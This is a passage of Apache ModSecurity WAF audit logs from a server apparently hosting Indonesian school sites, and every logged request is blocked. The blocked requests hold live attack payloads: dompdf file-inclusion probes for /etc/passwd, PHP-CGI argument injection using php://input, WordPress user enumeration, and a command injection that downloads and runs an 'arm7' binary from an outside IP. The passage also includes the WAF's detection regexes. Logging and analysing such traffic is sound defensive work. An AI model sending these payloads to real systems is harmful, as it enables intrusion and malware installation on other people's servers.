"contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469885 1285 (- - -) Stopwatch2: 1748673628469885 1285; combined=388, p1=280, p2=86, p3=0, p4=0, p5=22, sr=45, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1239c2b-Z-- --bde5ae1c-A-- [31/May/2025:13:40:28 +0700] aDqkXOg1nD2n5twq7Ns7vgAAAEQ 103.236.140.4 47424 103.236.140.4 8181 --bde5ae1c-B-- POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 34 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114, 103.236.140.4 Cookie: X-Varnish: 151622786 --bde5ae1c-C-- --bde5ae1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bde5ae1c-E-- --bde5ae1c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748673628469059 2543 (- - -) Stopwatch2: 1748673628469059 2543; combined=1671, p1=324, p2=1330, p3=0, p4=0, p5=17, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bde5ae1c-Z-- --9966ed26-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzwAAANg 103.236.140.4 47488 103.236.140.4 8181 --9966ed26-B-- GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169673110 --9966ed26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9966ed26-E-- --9966ed26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470210 1605 (- - -) Stopwatch2: 1748673628470210 1605; combined=379, p1=290, p2=72, p3=0, p4=0, p5=17, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9966ed26-Z-- --82c32047-A-- [31/May/2025:13:40:28 +0700] aDqkXJ3Kgs4r2wz12c6O9gAAAAw 103.236.140.4 47490 103.236.140.4 8181 --82c32047-B-- GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 123499265 --82c32047-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82c32047-E-- --82c32047-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470426 1646 (- - -) Stopwatch2: 1748673628470426 1646; combined=357, p1=258, p2=83, p3=0, p4=0, p5=16, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82c32047-Z-- --672ef274-A-- [31/May/2025:13:40:28 +0700] aDqkXB_L2Rte6DjSjWYwSQAAAI0 103.236.140.4 47456 103.236.140.4 8181 --672ef274-B-- GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 150934211 --672ef274-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --672ef274-E-- --672ef274-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469614 2613 (- - -) Stopwatch2: 1748673628469614 2613; combined=546, p1=402, p2=116, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --672ef274-Z-- --7c90f330-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzQAAAM4 103.236.140.4 47438 103.236.140.4 8181 --7c90f330-B-- GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 163078375 --7c90f330-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7c90f330-E-- --7c90f330-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469614 2721 (- - -) Stopwatch2: 1748673628469614 2721; combined=598, p1=406, p2=155, p3=0, p4=0, p5=37, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c90f330-Z-- --e99a380a-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzgAAANM 103.236.140.4 47484 103.236.140.4 8181 --e99a380a-B-- GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169048261 --e99a380a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e99a380a-E-- --e99a380a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470063 2391 (- - -) Stopwatch2: 1748673628470063 2391; combined=619, p1=414, p2=154, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e99a380a-Z-- --b2925d25-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6L0AAAAMk 103.236.140.4 47444 103.236.140.4 8181 --b2925d25-B-- GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 154654266 --b2925d25-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2925d25-E-- --b2925d25-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628471146 1471 (- - -) Stopwatch2: 1748673628471146 1471; combined=399, p1=291, p2=70, p3=0, p4=0, p5=37, sr=43, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2925d25-Z-- --e2702741-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6L0QAAANA 103.236.140.4 47484 103.236.140.4 8181 --e2702741-B-- GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 164649756 --e2702741-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2702741-E-- --e2702741-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748673628472615 1562 (- - -) Stopwatch2: 1748673628472615 1562; combined=488, p1=362, p2=100, p3=0, p4=0, p5=26, sr=104, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2702741-Z-- --41980f50-A-- [31/May/2025:14:00:48 +0700] aDqpIOg1nD2n5twq7Ns_ugAAAEk 103.236.140.4 35150 103.236.140.4 8181 --41980f50-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --41980f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41980f50-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748674848681833 998 (- - -) Stopwatch2: 1748674848681833 998; combined=430, p1=390, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41980f50-Z-- --eadf9804-A-- [31/May/2025:14:04:15 +0700] aDqp7-g1nD2n5twq7NtAiwAAAEc 103.236.140.4 37872 103.236.140.4 8181 --eadf9804-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eadf9804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eadf9804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675055387396 2819 (- - -) Stopwatch2: 1748675055387396 2819; combined=1263, p1=428, p2=805, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eadf9804-Z-- --81afdd35-A-- [31/May/2025:14:05:20 +0700] aDqqMB_L2Rte6DjSjWY0wAAAAIs 103.236.140.4 38292 103.236.140.4 8181 --81afdd35-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.0.17.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.0.17.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81afdd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81afdd35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675120400091 3626 (- - -) Stopwatch2: 1748675120400091 3626; combined=1491, p1=468, p2=983, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81afdd35-Z-- --6ad0cb40-A-- [31/May/2025:14:06:40 +0700] aDqqgOg1nD2n5twq7NtA6QAAAE0 103.236.140.4 39068 103.236.140.4 8181 --6ad0cb40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.85.82.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.85.82.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6ad0cb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ad0cb40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675200489984 2938 (- - -) Stopwatch2: 1748675200489984 2938; combined=1363, p1=433, p2=901, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ad0cb40-Z-- --9d2ea067-A-- [31/May/2025:14:25:31 +0700] aDqu653Kgs4r2wz12c6XtQAAABI 103.236.140.4 53660 103.236.140.4 8181 --9d2ea067-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9d2ea067-C-- --9d2ea067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d2ea067-E-- --9d2ea067-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748676331501329 4569 (- - -) Stopwatch2: 1748676331501329 4569; combined=2769, p1=515, p2=2208, p3=0, p4=0, p5=46, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d2ea067-Z-- --5e5b3b1b-A-- [31/May/2025:14:58:12 +0700] aDq2lOg1nD2n5twq7NtMwgAAAEU 103.236.140.4 59172 103.236.140.4 8181 --5e5b3b1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.160.106.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.160.106.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e5b3b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e5b3b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748678292093665 2736 (- - -) Stopwatch2: 1748678292093665 2736; combined=1263, p1=405, p2=829, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e5b3b1b-Z-- --d9a5f038-A-- [31/May/2025:15:12:45 +0700] aDq5_eg1nD2n5twq7NtSMAAAAEc 103.236.140.4 47012 103.236.140.4 8181 --d9a5f038-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.171.53.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.171.53.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9a5f038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9a5f038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 